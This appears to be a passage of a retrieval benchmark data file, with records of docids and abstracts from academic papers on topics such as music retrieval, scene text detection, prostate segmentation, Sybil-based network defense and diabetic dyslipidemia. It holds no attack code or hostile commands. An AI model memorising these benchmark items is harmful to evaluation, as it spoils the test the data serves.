"text": "This survey paper provides an overview of content-based music information retrieval systems, both for audio and for symbolic music notation. Matching algorithms and indexing methods are briefly presented. The need for a TREC-like comparison of matching algorithms such as MIREX at ISMIR becomes clear from the high number of quite different methods which so far only have been used on different data collections. We placed the systems on a map showing the tasks and users for which they are suitable, and we find that existing content-based retrieval systems fail to cover a gap between the very general and the very specific retrieval tasks.",
"title": ""
},
{
"docid": "6f3ec6136c57bcd00ba810c9af7493d6",
"text": "In this article, we summarize some of the recent advancements in assistive technologies that are designed for people with visual impairments (VI) and blind people. Present technology enables applications to be actively disseminated and to efficiently operate on handheld mobile devices. These applications include also those that require high computational requirements. As a consequent, digital travel aids, visual sensing modules, text-to-speech applications, navigational assistance tools, and the combination with diverse assistive haptic devices are becoming consolidated with typical mobile devices. This direction has opened diversity of new perspectives for practical training and rehabilitation of people with VI. The aim of this article is to give an overview about the recent developments of assistive applications designed for people with VI. In conclusion, we recommend designing a unified robust system for people with VI which provides the support of the different kind of services.",
"title": ""
},
{
"docid": "2d3e779b25d0ffe8a97744be370125fa",
"text": "This paper describes the details of Sighthound’s fully automated age, gender and emotion recognition system. The backbone of our system consists of several deep convolutional neural networks that are not only computationally inexpensive, but also provide state-of-theart results on several competitive benchmarks. To power our novel deep networks, we collected large labeled datasets through a semi-supervised pipeline to reduce the annotation effort/time. We tested our system on several public benchmarks and report outstanding results. Our age, gender and emotion recognition models are available to developers through the Sighthound Cloud API at https://www.sighthound.com/products/cloud",
"title": ""
},
{
"docid": "eaec7fb5490ccabd52ef7b4b5abd25f6",
"text": "Automatic and reliable segmentation of the prostate is an important but difficult task for various clinical applications such as prostate cancer radiotherapy. The main challenges for accurate MR prostate localization lie in two aspects: (1) inhomogeneous and inconsistent appearance around prostate boundary, and (2) the large shape variation across different patients. To tackle these two problems, we propose a new deformable MR prostate segmentation method by unifying deep feature learning with the sparse patch matching. First, instead of directly using handcrafted features, we propose to learn the latent feature representation from prostate MR images by the stacked sparse auto-encoder (SSAE). Since the deep learning algorithm learns the feature hierarchy from the data, the learned features are often more concise and effective than the handcrafted features in describing the underlying data. To improve the discriminability of learned features, we further refine the feature representation in a supervised fashion. Second, based on the learned features, a sparse patch matching method is proposed to infer a prostate likelihood map by transferring the prostate labels from multiple atlases to the new prostate MR image. Finally, a deformable segmentation is used to integrate a sparse shape model with the prostate likelihood map for achieving the final segmentation. The proposed method has been extensively evaluated on the dataset that contains 66 T2-wighted prostate MR images. Experimental results show that the deep-learned features are more effective than the handcrafted features in guiding MR prostate segmentation. Moreover, our method shows superior performance than other state-of-the-art segmentation methods.",
"title": ""
},
{
"docid": "ddfc7c8b86ceb96935f0567e7cfb79f8",
"text": "This Short Review critically evaluates three hypotheses about the effects of emotion on memory: First, emotion usually enhances memory. Second, when emotion does not enhance memory, this can be understood by the magnitude of physiological arousal elicited, with arousal benefiting memory to a point but then having a detrimental influence. Third, when emotion facilitates the processing of information, this also facilitates the retention of that same information. For each of these hypotheses, we summarize the evidence consistent with it, present counter-evidence suggesting boundary conditions for the effect, and discuss the implications for future research.",
"title": ""
},
{
"docid": "102e1718e03b3a4e96ee8c2212738792",
"text": "This paper introduces a new method for the rapid development of complex rule bases involving cue phrases for the purpose of classifying text segments. The method is based on Ripple-Down Rules, a knowledge acquisition method that proved very successful in practice for building medical expert systems and does not require a knowledge engineer. We implemented our system KAFTAN and demonstrate the applicability of our method to the task of classifying scientific citations. Building cue phrase rules in KAFTAN is easy and efficient. We demonstrate the effectiveness of our approach by presenting experimental results where our resulting classifier clearly outperforms previously built classifiers in the recent literature.",
"title": ""
},
{
"docid": "2176e4119a16409154ae3d8f5d74c901",
"text": "The so-called Internet of Things (IoT) has attracted increasing attention in the field of computer and information science. In this paper, a specific application of IoT, named Safety Management System for Tower Crane Groups (SMS-TC), is proposed for use in the construction industry field. The operating status of each tower crane was detected by a set of customized sensors, including horizontal and vertical position sensors for the trolley, angle sensors for the jib and load, tilt and wind speed sensors for the tower body. The sensor data is collected and processed by the Tower Crane Safety Terminal Equipment (TC-STE) installed in the driver's operating room. Wireless communication between each TC-STE and the Local Monitoring Terminal (LMT) at the ground worksite were fulfilled through a Zigbee wireless network. LMT can share the status information of the whole group with each TC-STE, while the LMT records the real-time data and reports it to the Remote Supervision Platform (RSP) through General Packet Radio Service (GPRS). Based on the global status data of the whole group, an anti-collision algorithm was executed in each TC-STE to ensure the safety of each tower crane during construction. Remote supervision can be fulfilled using our client software installed on a personal computer (PC) or smartphone. SMS-TC could be considered as a promising practical application that combines a Wireless Sensor Network with the Internet of Things.",
"title": ""
},
{
"docid": "c1ddf32bfa71f32e51daf31e077a87cd",
"text": "There is a step of significant difficulty experienced by brain-computer interface (BCI) users when going from the calibration recording to the feedback application. This effect has been previously studied and a supervised adaptation solution has been proposed. In this paper, we suggest a simple unsupervised adaptation method of the linear discriminant analysis (LDA) classifier that effectively solves this problem by counteracting the harmful effect of nonclass-related nonstationarities in electroencephalography (EEG) during BCI sessions performed with motor imagery tasks. For this, we first introduce three types of adaptation procedures and investigate them in an offline study with 19 datasets. Then, we select one of the proposed methods and analyze it further. The chosen classifier is offline tested in data from 80 healthy users and four high spinal cord injury patients. Finally, for the first time in BCI literature, we apply this unsupervised classifier in online experiments. Additionally, we show that its performance is significantly better than the state-of-the-art supervised approach.",
"title": ""
},
{
"docid": "9c507a2b1f57750d1b4ffeed6979a06f",
"text": "Once considered provocative, the notion that the wisdom of the crowd is superior to any individual has become itself a piece of crowd wisdom, leading to speculation that online voting may soon put credentialed experts out of business. Recent applications include political and economic forecasting, evaluating nuclear safety, public policy, the quality of chemical probes, and possible responses to a restless volcano. Algorithms for extracting wisdom from the crowd are typically based on a democratic voting procedure. They are simple to apply and preserve the independence of personal judgment. However, democratic methods have serious limitations. They are biased for shallow, lowest common denominator information, at the expense of novel or specialized knowledge that is not widely shared. Adjustments based on measuring confidence do not solve this problem reliably. Here we propose the following alternative to a democratic vote: select the answer that is more popular than people predict. We show that this principle yields the best answer under reasonable assumptions about voter behaviour, while the standard ‘most popular’ or ‘most confident’ principles fail under exactly those same assumptions. Like traditional voting, the principle accepts unique problems, such as panel decisions about scientific or artistic merit, and legal or historical disputes. The potential application domain is thus broader than that covered by machine learning and psychometric methods, which require data across multiple questions.",
"title": ""
},
{
"docid": "53f7958f77563b9dfaeedf38099cedf2",
"text": "The availability of new techniques and tools for Video Surveillance and the capability of storing huge amounts of visual data acquired by hundreds of cameras every day call for a convergence between pattern recognition, computer vision and multimedia paradigms. A clear need for this convergence is shown by new research projects which attempt to exploit both ontology-based retrieval and video analysis techniques also in the field of surveillance. This paper presents the ViSOR (Video Surveillance Online Repository) framework, designed with the aim of establishing an open platform for collecting, annotating, retrieving, and sharing surveillance videos, as well as evaluating the performance of automatic surveillance systems. Annotations are based on a reference ontology which has been defined integrating hundreds of concepts, some of them coming from the LSCOM and MediaMill ontologies. A new annotation classification schema is also provided, which is aimed at identifying the spatial, temporal and domain detail level used. The ViSOR web interface allows video browsing, querying by annotated concepts or by keywords, compressed video previewing, media downloading and uploading. Finally, ViSOR includes a performance evaluation desk which can be used to compare different annotations.",
"title": ""
},
{
"docid": "9a42785b743ed0b38334819365977020",
"text": "Low-cost but high-performance robot arms are required for widespread use of service robots. Most robot arms use expensive motors and speed reducers to provide torques sufficient to support the robot mass and payload. If the gravitational torques due to the robot mass, which is usually much greater than the payload, can be compensated for by some means; the robot would need much smaller torques, which can be delivered by cheap actuator modules. To this end, we propose a novel counterbalance mechanism which can completely counterbalance the gravitational torques due to the robot mass. Since most 6-DOF robots have three pitch joints, which are subject to gravitational torques, we propose a 3-DOF counterbalance mechanism based on the double parallelogram mechanism, in which reference planes are provided to each joint for proper counterbalancing. A 5-DOF counterbalance robot arm was built to demonstrate the performance of the proposed mechanism. Simulation and experimental results showed that the proposed mechanism had effectively decreased the torque required to support the robot mass, thus allowing the prospective use of low-cost motors and speed reducers for high-performance robot arms.",
"title": ""
},
{
"docid": "59cf9407986097ac31214c0289d6f8a2",
"text": "Model selection is a core aspect in machine learning and is, occasionally, multi-objective in nature. For instance, hyper-parameter selection in a multi-task learning context is of multi-objective nature, since all the tasks' objectives must be optimized simultaneously. In this paper, a novel multi-objective racing algorithm (RA), namely S-Race, is put forward. Given an ensemble of models, our task is to reliably identify Pareto optimal models evaluated against multiple objectives, while minimizing the total computational cost. As a RA, S-Race attempts to eliminate non-promising models with confidence as early as possible, so as to concentrate computational resources on promising ones. Simultaneously, it addresses the problem of multi-objective model selection (MOMS) in the sense of Pareto optimality. In S-Race, the nonparametric sign test is utilized for pair-wise dominance relationship identification. Moreover, a discrete Holm's step-down procedure is adopted to control the family-wise error rate of the set of hypotheses made simultaneously. The significance level assigned to each family is adjusted adaptively during the race. In order to illustrate its merits, S-Race is applied on three MOMS problems: (1) selecting support vector machines for classification; (2) tuning the parameters of artificial bee colony algorithms for numerical optimization; and (3) constructing optimal hybrid recommendation systems for movie recommendation. The experimental results confirm that S-Race is an efficient and effective MOMS algorithm compared to a brute-force approach.",
"title": ""
},
{
"docid": "587f58f291732bfb8954e34564ba76fd",
"text": "Blood pressure oscillometric waveforms behave as amplitude modulated nonlinear signals with frequency fluctuations. Their oscillating nature can be better analyzed by the digital Taylor-Fourier transform (DTFT), recently proposed for phasor estimation in oscillating power systems. Based on a relaxed signal model that includes Taylor components greater than zero, the DTFT is able to estimate not only the oscillation itself, as does the digital Fourier transform (DFT), but also its derivatives included in the signal model. In this paper, an oscillometric waveform is analyzed with the DTFT, and its zeroth and first oscillating harmonics are illustrated. The results show that the breathing activity can be separated from the cardiac one through the critical points of the first component, determined by the zero crossings of the amplitude derivatives estimated from the third Taylor order model. On the other hand, phase derivative estimates provide the fluctuations of the cardiac frequency and its derivative, new parameters that could improve the precision of the systolic and diastolic blood pressure assignment. The DTFT envelope estimates uniformly converge from K=3, substantially improving the harmonic separation of the DFT.",
"title": ""
},
{
"docid": "b27d6f04073e381d69e958f536586a11",
"text": "The idea of robotic companions capable of establishing meaningful relationships with humans remains far from being accomplished. To achieve this, robots must interact with people in natural ways, employing social mechanisms that people use while interacting with each other. One such mechanism is empathy, often seen as the basis of social cooperation and prosocial behaviour. We argue that artificial companions capable of behaving in an empathic manner, which involves the capacity to recognise another’s affect and respond appropriately, are more successful at establishing and maintaining a positive relationship with users. This paper presents a study where an autonomous robot with empathic capabilities acts as a social companion to two players in a chess game. The robot reacts to the moves played on the chessboard by displaying several facial expressions and verbal utterances, showing empathic behaviours towards one player and behaving neutrally towards the other. Quantitative and qualitative results of 31 participants indicate that users towards whom the robot behaved empathically perceived the robot as friendlier, which supports our hypothesis that empathy plays a key role in human-robot interaction.",
"title": ""
}
] | scidocsrr |
44a4f3fac83a118baa985b56a2522b27 | R2 CNN: Rotational Region CNN for Arbitrarily-Oriented Scene Text Detection | [
{
"docid": "ead5432cb390756a99e4602a9b6266bf",
"text": "In this paper, we present a new approach for text localization in natural images, by discriminating text and non-text regions at three levels: pixel, component and text line levels. Firstly, a powerful low-level filter called the Stroke Feature Transform (SFT) is proposed, which extends the widely-used Stroke Width Transform (SWT) by incorporating color cues of text pixels, leading to significantly enhanced performance on inter-component separation and intra-component connection. Secondly, based on the output of SFT, we apply two classifiers, a text component classifier and a text-line classifier, sequentially to extract text regions, eliminating the heuristic procedures that are commonly used in previous approaches. The two classifiers are built upon two novel Text Covariance Descriptors (TCDs) that encode both the heuristic properties and the statistical characteristics of text stokes. Finally, text regions are located by simply thresholding the text-line confident map. Our method was evaluated on two benchmark datasets: ICDAR 2005 and ICDAR 2011, and the corresponding F-measure values are 0.72 and 0.73, respectively, surpassing previous methods in accuracy by a large margin.",
"title": ""
},
{
"docid": "c551575e68a8061461dc6c78b76a0386",
"text": "Recently, scene text detection has become an active research topic in computer vision and document analysis, because of its great importance and significant challenge. However, vast majority of the existing methods detect text within local regions, typically through extracting character, word or line level candidates followed by candidate aggregation and false positive elimination, which potentially exclude the effect of wide-scope and long-range contextual cues in the scene. To take full advantage of the rich information available in the whole natural image, we propose to localize text in a holistic manner, by casting scene text detection as a semantic segmentation problem. The proposed algorithm directly runs on full images and produces global, pixel-wise prediction maps, in which detections are subsequently formed. To better make use of the properties of text, three types of information regarding text region, individual characters and their relationship are estimated, with a single Fully Convolutional Network (FCN) model. With such predictions of text properties, the proposed algorithm can simultaneously handle horizontal, multi-oriented and curved text in real-world natural images. The experiments on standard benchmarks, including ICDAR 2013, ICDAR 2015 and MSRA-TD500, demonstrate that the proposed algorithm substantially outperforms previous state-ofthe-art approaches. Moreover, we report the first baseline result on the recently-released, large-scale dataset COCO-Text. Keywords—Scene text detection, fully convolutional network, holistic prediction, natural images.",
"title": ""
},
{
"docid": "2ff3238a25fd7055517a2596e5e0cd7c",
"text": "Previous approaches for scene text detection have already achieved promising performances across various benchmarks. However, they usually fall short when dealing with challenging scenarios, even when equipped with deep neural network models, because the overall performance is determined by the interplay of multiple stages and components in the pipelines. In this work, we propose a simple yet powerful pipeline that yields fast and accurate text detection in natural scenes. The pipeline directly predicts words or text lines of arbitrary orientations and quadrilateral shapes in full images, eliminating unnecessary intermediate steps (e.g., candidate aggregation and word partitioning), with a single neural network. The simplicity of our pipeline allows concentrating efforts on designing loss functions and neural network architecture. Experiments on standard datasets including ICDAR 2015, COCO-Text and MSRA-TD500 demonstrate that the proposed algorithm significantly outperforms state-of-the-art methods in terms of both accuracy and efficiency. On the ICDAR 2015 dataset, the proposed algorithm achieves an F-score of 0.7820 at 13.2fps at 720p resolution.",
"title": ""
}
] | [
{
"docid": "390f82c33b6b0966513a2b6480712dd3",
"text": "Social media systems promise powerful opportunities for people to connect to timely, relevant information at the hyper local level. Yet, finding the meaningful signal in noisy social media streams can be quite daunting to users. In this paper, we present and evaluate Whoo.ly, a web service that provides neighborhood-specific information based on Twitter posts that were automatically inferred to be hyperlocal. Whoo.ly automatically extracts and summarizes hyperlocal information about events, topics, people, and places from these Twitter posts. We provide an overview of our design goals with Whoo.ly and describe the system including the user interface and our unique event detection and summarization algorithms. We tested the usefulness of the system as a tool for finding neighborhood information through a comprehensive user study. The outcome demonstrated that most participants found Whoo.ly easier to use than Twitter and they would prefer it as a tool for exploring their neighborhoods.",
"title": ""
},
{
"docid": "b9b53f3e3196e31a24e32dd1902eea63",
"text": "Currency, defined here as banknotes and coins, plays an important role in the economy as a medium of exchange and a store of value. For Australia’s currency to function efficiently, it is important that the public has confidence in it and is therefore willing to accept banknotes and coins in transactions. Counterfeiting currency is a crime under the Crimes (Currency) Act 1981, and carries penalties of up to 14 years’ jail. People who fall victim to this crime have essentially been robbed. They cannot be reimbursed for their loss as, among other things, doing so would serve as an incentive to counterfeiters to continue their illegal activities. As a result, a high prevalence of counterfeiting can threaten public confidence in currency given that someone who accepts a counterfeit in place of a genuine banknote is left out of pocket and may be reluctant to accept banknotes in the future. Under the Reserve Bank Act 1959, the Reserve Bank issues Australia’s banknotes and has a mandate to contribute to the stability of the Australian currency. To ensure the security of these banknotes, the Reserve Bank works actively to monitor and manage the threat of banknote counterfeiting in Australia. The Reserve Bank works in partnership with key stakeholders to ensure that cash-handling professionals have information on how to detect counterfeits, that machines can authenticate banknotes, and that counterfeiters are apprehended and prosecuted (Evans, Gallagher and Martz 2015). The periodic issuance of new banknote series with upgraded security features, as is currently under way in Australia, is key to ensuring the security of, and thus confidence in, banknotes. Research into potential new security features is ongoing so that the Reserve Bank is well placed to develop and issue new banknote series as required and before counterfeiting levels become problematic. Monitoring of counterfeit activities informs the Bank’s decisions about the timing of such issuance. Recent Trends in Banknote Counterfeiting",
"title": ""
},
{
"docid": "885bf946dbbfc462cd066794fe486da3",
"text": "Efficient implementation of block cipher is important on the way to achieving high efficiency with good understand ability. Numerous number of block cipher including Advance Encryption Standard have been implemented using different platform. However the understanding of the AES algorithm step by step is very complicated. This paper presents the implementation of AES algorithm and explains Avalanche effect with the help of Avalanche test result. For this purpose we use Xilinx ISE 9.1i platform in Algorithm development and ModelSim SE 6.3f platform for results confirmation and computation.",
"title": ""
},
{
"docid": "83393c9a0392249409a057914c71b1a0",
"text": "Recent achievement of the learning-based classification leads to the noticeable performance improvement in automatic polyp detection. Here, building large good datasets is very crucial for learning a reliable detector. However, it is practically challenging due to the diversity of polyp types, expensive inspection, and labor-intensive labeling tasks. For this reason, the polyp datasets usually tend to be imbalanced, i.e., the number of non-polyp samples is much larger than that of polyp samples, and learning with those imbalanced datasets results in a detector biased toward a non-polyp class. In this paper, we propose a data sampling-based boosting framework to learn an unbiased polyp detector from the imbalanced datasets. In our learning scheme, we learn multiple weak classifiers with the datasets rebalanced by up/down sampling, and generate a polyp detector by combining them. In addition, for enhancing discriminability between polyps and non-polyps that have similar appearances, we propose an effective feature learning method using partial least square analysis, and use it for learning compact and discriminative features. Experimental results using challenging datasets show obvious performance improvement over other detectors. We further prove effectiveness and usefulness of the proposed methods with extensive evaluation.",
"title": ""
},
{
"docid": "8b3042021e48c86873e00d646f65b052",
"text": "We derive a numerical method for Darcy flow, hence also for Poisson’s equation in first order form, based on discrete exterior calculus (DEC). Exterior calculus is a generalization of vector calculus to smooth manifolds and DEC is its discretization on simplicial complexes such as triangle and tetrahedral meshes. We start by rewriting the governing equations of Darcy flow using the language of exterior calculus. This yields a formulation in terms of flux differential form and pressure. The numerical method is then derived by using the framework provided by DEC for discretizing differential forms and operators that act on forms. We also develop a discretization for spatially dependent Hodge star that varies with the permeability of the medium. This also allows us to address discontinuous permeability. The matrix representation for our discrete non-homogeneous Hodge star is diagonal, with positive diagonal entries. The resulting linear system of equations for flux and pressure are saddle type, with a diagonal matrix as the top left block. Our method requires the use of meshes in which each simplex contains its circumcenter. The performance of the proposed numerical method is illustrated on many standard test problems. These include patch tests in two and three dimensions, comparison with analytically known solution in two dimensions, layered medium with alternating permeability values, and a test with a change in permeability along the flow direction. A short introduction to the relevant parts of smooth and discrete exterior calculus is included in this paper. We also include a discussion of the boundary condition in terms of exterior calculus.",
"title": ""
},
{
"docid": "09eb96a9be1c8ee56503881e0fd936d5",
"text": "Essential oils are volatile, natural, complex mixtures of compounds characterized by a strong odour and formed by aromatic plants as secondary metabolites. The chemical composition of the essential oil obtained by hydrodistillation from the whole plant of Pulicaria inuloides grown in Yemen and collected at full flowering stage were analyzed by Gas chromatography-Mass spectrometry (GC-MS). Several oil components were identified based upon comparison of their mass spectral data with those of reference compounds. The main components identified in the oil were 47.34% of 2-Cyclohexen-1-one, 2-methyl-5-(1-methyl with Hexadecanoic acid (CAS) (12.82%) and Ethane, 1,2-diethoxy(9.613%). In this study, mineral contents of whole plant of P. inuloides were determined by atomic absorption spectroscopy. Highest level of K, Mg, Na, Fe and Ca of 159.5, 29.5, 14.2, 13.875 and 5.225 mg/100 g were found in P. inuloides.",
"title": ""
},
{
"docid": "999c7d8d16817d4b991e5b794be3b074",
"text": "Smile detection from facial images is a specialized task in facial expression analysis with many potential applications such as smiling payment, patient monitoring and photo selection. The current methods on this study are to represent face with low-level features, followed by a strong classifier. However, these manual features cannot well discover information implied in facial images for smile detection. In this paper, we propose to extract high-level features by a well-designed deep convolutional networks (CNN). A key contribution of this work is that we use both recognition and verification signals as supervision to learn expression features, which is helpful to reduce same-expression variations and enlarge different-expression differences. Our method is end-to-end, without complex pre-processing often used in traditional methods. High-level features are taken from the last hidden layer neuron activations of deep CNN, and fed into a soft-max classifier to estimate. Experimental results show that our proposed method is very effective, which outperforms the state-of-the-art methods. On the GENKI smile detection dataset, our method reduces the error rate by 21% compared with the previous best method.",
"title": ""
},
{
"docid": "2281d739c6858d35eb5f3650d2d03474",
"text": "We discuss an implementation of the RRT* optimal motion planning algorithm for the half-car dynamical model to enable autonomous high-speed driving. To develop fast solutions of the associated local steering problem, we observe that the motion of a special point (namely, the front center of oscillation) can be modeled as a double integrator augmented with fictitious inputs. We first map the constraints on tire friction forces to constraints on these augmented inputs, which provides instantaneous, state-dependent bounds on the curvature of geometric paths feasibly traversable by the front center of oscillation. Next, we map the vehicle's actual inputs to the augmented inputs. The local steering problem for the half-car dynamical model can then be transformed to a simpler steering problem for the front center of oscillation, which we solve efficiently by first constructing a curvature-bounded geometric path and then imposing a suitable speed profile on this geometric path. Finally, we demonstrate the efficacy of the proposed motion planner via numerical simulation results.",
"title": ""
},
{
"docid": "b6303ae2b77ac5c187694d5320ef65ff",
"text": "Mechanisms for continuously changing or shifting a system's attack surface are emerging as game-changers in cyber security. In this paper, we propose a novel defense mechanism for protecting the identity of nodes in Mobile Ad Hoc Networks and defeat the attacker's reconnaissance efforts. The proposed mechanism turns a classical attack mechanism - Sybil - into an effective defense mechanism, with legitimate nodes periodically changing their virtual identity in order to increase the uncertainty for the attacker. To preserve communication among legitimate nodes, we modify the network layer by introducing (i) a translation service for mapping virtual identities to real identities; (ii) a protocol for propagating updates of a node's virtual identity to all legitimate nodes; and (iii) a mechanism for legitimate nodes to securely join the network. We show that the proposed approach is robust to different types of attacks, and also show that the overhead introduced by the update protocol can be controlled by tuning the update frequency.",
"title": ""
},
{
"docid": "8c2c54207fa24358552bc30548bec5bc",
"text": "This paper proposes an edge bundling approach applied on parallel coordinates to improve the visualization of cluster information directly from the overview. Lines belonging to a cluster are bundled into a single curve between axes, where the horizontal and vertical positioning of the bundling intersection (known as bundling control points) to encode pertinent information about the cluster in a given dimension, such as variance, standard deviation, mean, median, and so on. The hypothesis is that adding this information to the overview improves the visualization overview at the same that it does not prejudice the understanding in other aspects. We have performed tests with participants to compare our approach with classic parallel coordinates and other consolidated bundling technique. The results showed most of the initially proposed hypotheses to be confirmed at the end of the study, as the tasks were performed successfully in the majority of tasks maintaining a low response time in average, as well as having more aesthetic pleasing according to participants' opinion.",
"title": ""
},
{
"docid": "676a91eee10de39ab11ea9c98b78ea0a",
"text": "Advances in synthetic biology have enabled the engineering of cells with genetic circuits in order to program cells with new biological behavior, dynamic gene expression, and logic control. This cellular engineering progression offers an array of living sensors that can discriminate between cell states, produce a regulated dose of therapeutic biomolecules, and function in various delivery platforms. In this review, we highlight and summarize the tools and applications in bacterial and mammalian synthetic biology. The examples detailed in this review provide insight to further understand genetic circuits, how they are used to program cells with novel functions, and current methods to reliably interface this technology in vivo; thus paving the way for the design of promising novel therapeutic applications.",
"title": ""
},
{
"docid": "91eac59a625914805a22643c6fe79ad1",
"text": "Channel state information at the transmitter (CSIT) is essential for frequency-division duplexing (FDD) massive MIMO systems, but conventional solutions involve overwhelming overhead both for downlink channel training and uplink channel feedback. In this letter, we propose a joint CSIT acquisition scheme to reduce the overhead. Particularly, unlike conventional schemes where each user individually estimates its own channel and then feed it back to the base station (BS), we propose that all scheduled users directly feed back the pilot observation to the BS, and then joint CSIT recovery can be realized at the BS. We further formulate the joint CSIT recovery problem as a low-rank matrix completion problem by utilizing the low-rank property of the massive MIMO channel matrix, which is caused by the correlation among users. Finally, we propose a hybrid low-rank matrix completion algorithm based on the singular value projection to solve this problem. Simulations demonstrate that the proposed scheme can provide accurate CSIT with lower overhead than conventional schemes.",
"title": ""
},
{
"docid": "abde419c67119fa9d16f365262d39b34",
"text": "Silicon nitride is the most commonly used passivation layer in biosensor applications where electronic components must be interfaced with ionic solutions. Unfortunately, the predominant method for functionalizing silicon nitride surfaces, silane chemistry, suffers from a lack of reproducibility. As an alternative, we have developed a silane-free pathway that allows for the direct functionalization of silicon nitride through the creation of primary amines formed by exposure to a radio frequency glow discharge plasma fed with humidified air. The aminated surfaces can then be further functionalized by a variety of methods; here we demonstrate using glutaraldehyde as a bifunctional linker to attach a robust NeutrAvidin (NA) protein layer. Optimal amine formation, based on plasma exposure time, was determined by labeling treated surfaces with an amine-specific fluorinated probe and characterizing the coverage using X-ray photoelectron spectroscopy (XPS). XPS and radiolabeling studies also reveal that plasma-modified surfaces, as compared with silane-modified surfaces, result in similar NA surface coverage, but notably better reproducibility.",
"title": ""
},
{
"docid": "7853936d58687b143bc135e6e60092ce",
"text": "Multilabel learning has become a relevant learning paradigm in the past years due to the increasing number of fields where it can be applied and also to the emerging number of techniques that are being developed. This article presents an up-to-date tutorial about multilabel learning that introduces the paradigm and describes the main contributions developed. Evaluation measures, fields of application, trending topics, and resources are also presented.",
"title": ""
},
{
"docid": "af48f00757d8e95d92facca57cd9d13c",
"text": "Remaining useful life (RUL) prediction allows for predictive maintenance of machinery, thus reducing costly unscheduled maintenance. Therefore, RUL prediction of machinery appears to be a hot issue attracting more and more attention as well as being of great challenge. This paper proposes a model-based method for predicting RUL of machinery. The method includes two modules, i.e., indicator construction and RUL prediction. In the first module, a new health indicator named weighted minimum quantization error is constructed, which fuses mutual information from multiple features and properly correlates to the degradation processes of machinery. In the second module, model parameters are initialized using the maximum-likelihood estimation algorithm and RUL is predicted using a particle filtering-based algorithm. The proposed method is demonstrated using vibration signals from accelerated degradation tests of rolling element bearings. The prediction result identifies the effectiveness of the proposed method in predicting RUL of machinery.",
"title": ""
},
{
"docid": "7f110e4769b996de13afe63962bcf2d2",
"text": "Versu is a text-based simulationist interactive drama. Because it uses autonomous agents, the drama is highly replayable: you can play the same story from multiple perspectives, or assign different characters to the various roles. The architecture relies on the notion of a social practice to achieve coordination between the independent autonomous agents. A social practice describes a recurring social situation, and is a successor to the Schankian script. Social practices are implemented as reactive joint plans, providing affordances to the agents who participate in them. The practices never control the agents directly; they merely provide suggestions. It is always the individual agent who decides what to do, using utility-based reactive action selection.",
"title": ""
},
{
"docid": "ce55e0912f78fbe781c26598d61b3664",
"text": "This paper presents a reversible or lossless watermarking algorithm for images without using a location map in most cases. This algorithm employs prediction errors to embed data into an image. A sorting technique is used to record the prediction errors based on magnitude of its local variance. Using sorted prediction errors and, if needed, though rarely, a reduced size location map allows us to embed more data into the image with less distortion. The performance of the proposed reversible watermarking scheme is evaluated using different images and compared with four methods: those of Kamstra and Heijmans, Thodi and Rodriguez, and Lee et al. The results clearly indicate that the proposed scheme can embed more data with less distortion.",
"title": ""
},
{
"docid": "827e9045f932b146a8af66224e114be6",
"text": "Using a common set of attributes to determine which methodology to use in a particular data warehousing project.",
"title": ""
},
{
"docid": "17806963c91f6d6981f1dcebf3880927",
"text": "The ability to assess the reputation of a member in a web community is a need addressed in many different ways according to the many different stages in which the nature of communities has evolved over time. In the case of reputation of goods/services suppliers, the solutions available to prevent the feedback abuse are generally reliable but centralized under the control of few big Internet companies. In this paper we show how a decentralized and distributed feedback management system can be built on top of the Bitcoin blockchain.",
"title": ""
},
{
"docid": "9b9a2a9695f90a6a9a0d800192dd76f6",
"text": "Due to high competition in today's business and the need for satisfactory communication with customers, companies understand the inevitable necessity to focus not only on preventing customer churn but also on predicting their needs and providing the best services for them. The purpose of this article is to predict future services needed by wireless users, with data mining techniques. For this purpose, the database of customers of an ISP in Shiraz, which logs the customer usage of wireless internet connections, is utilized. Since internet service has three main factors to define (Time, Speed, Traffics) we predict each separately. First, future service demand is predicted by implementing a simple Recency, Frequency, Monetary (RFM) as a basic model. Other factors such as duration from first use, slope of customer's usage curve, percentage of activation, Bytes In, Bytes Out and the number of retries to establish a connection and also customer lifetime value are considered and added to RFM model. Then each one of R, F, M criteria is alternately omitted and the result is evaluated. Assessment is done through analysis node which determines the accuracy of evaluated data among partitioned data. The result shows that CART and C5.0 are the best algorithms to predict future services in this case. As for the features, depending upon output of each features, duration and transfer Bytes are the most important after RFM. An ISP may use the model discussed in this article to meet customers' demands and ensure their loyalty and satisfaction.",
"title": ""
}
] | scidocsrr |
29eea63213e67fed705a51de82e5e04c | Classifying the Political Leaning of News Articles and Users from User Votes | [
{
"docid": "7f05bd51c98140417ff73ec2d4420d6a",
"text": "An overwhelming number of news articles are available every day via the internet. Unfortunately, it is impossible for us to peruse more than a handful; furthermore it is difficult to ascertain an article’s social context, i.e., is it popular, what sorts of people are reading it, etc. In this paper, we develop a system to address this problem in the restricted domain of political news by harnessing implicit and explicit contextual information from the blogosphere. Specifically, we track thousands of blogs and the news articles they cite, collapsing news articles that have highly overlapping content. We then tag each article with the number of blogs citing it, the political orientation of those blogs, and the level of emotional charge expressed in the blog posts that link to the news article. We summarize and present the results to the user via a novel visualization which displays this contextual information; the user can then find the most popular articles, the articles most cited by liberals, the articles most emotionally discussed in the political blogosphere, etc.",
"title": ""
},
{
"docid": "f66854fd8e3f29ae8de75fc83d6e41f5",
"text": "This paper presents a general statistical methodology for the analysis of multivariate categorical data arising from observer reliability studies. The procedure essentially involves the construction of functions of the observed proportions which are directed at the extent to which the observers agree among themselves and the construction of test statistics for hypotheses involving these functions. Tests for interobserver bias are presented in terms of first-order marginal homogeneity and measures of interobserver agreement are developed as generalized kappa-type statistics. These procedures are illustrated with a clinical diagnosis example from the epidemiological literature.",
"title": ""
}
] | [
{
"docid": "a15275cc08ad7140e6dd0039e301dfce",
"text": "Cardiovascular disease is more prevalent in type 1 and type 2 diabetes, and continues to be the leading cause of death among adults with diabetes. Although atherosclerotic vascular disease has a multi-factorial etiology, disorders of lipid metabolism play a central role. The coexistence of diabetes with other risk factors, in particular with dyslipidemia, further increases cardiovascular disease risk. A characteristic pattern, termed diabetic dyslipidemia, consists of increased levels of triglycerides, low levels of high density lipoprotein cholesterol, and postprandial lipemia, and is mostly seen in patients with type 2 diabetes or metabolic syndrome. This review summarizes the trends in the prevalence of lipid disorders in diabetes, advances in the mechanisms contributing to diabetic dyslipidemia, and current evidence regarding appropriate therapeutic recommendations.",
"title": ""
},
{
"docid": "89318aa5769daa08a67ae7327c458e8e",
